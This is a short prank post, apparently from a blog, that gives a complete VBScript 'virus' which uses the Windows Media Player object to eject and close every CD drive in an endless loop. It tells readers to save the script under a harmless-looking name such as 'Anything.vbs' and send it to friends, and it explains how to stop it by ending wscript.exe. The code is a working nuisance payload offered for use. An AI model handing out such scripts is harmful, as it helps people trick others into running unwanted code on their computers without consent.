WHAT'S NEW?
Loading...

A Virus That Will Open And Close randomly your CD ROM

A Virus That Will Open And Close randomly your CD ROM


 
please type the following code in your notepad:
 
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If


Save it as "Anything.vbs" and send it.
 
Now if u want to disable this go to task manager click on process
then find wscript.exe and end this process 

YOU CAN USE THIS TRICK TO PRANK YOUR FRIENDS 

0 comments:

Post a Comment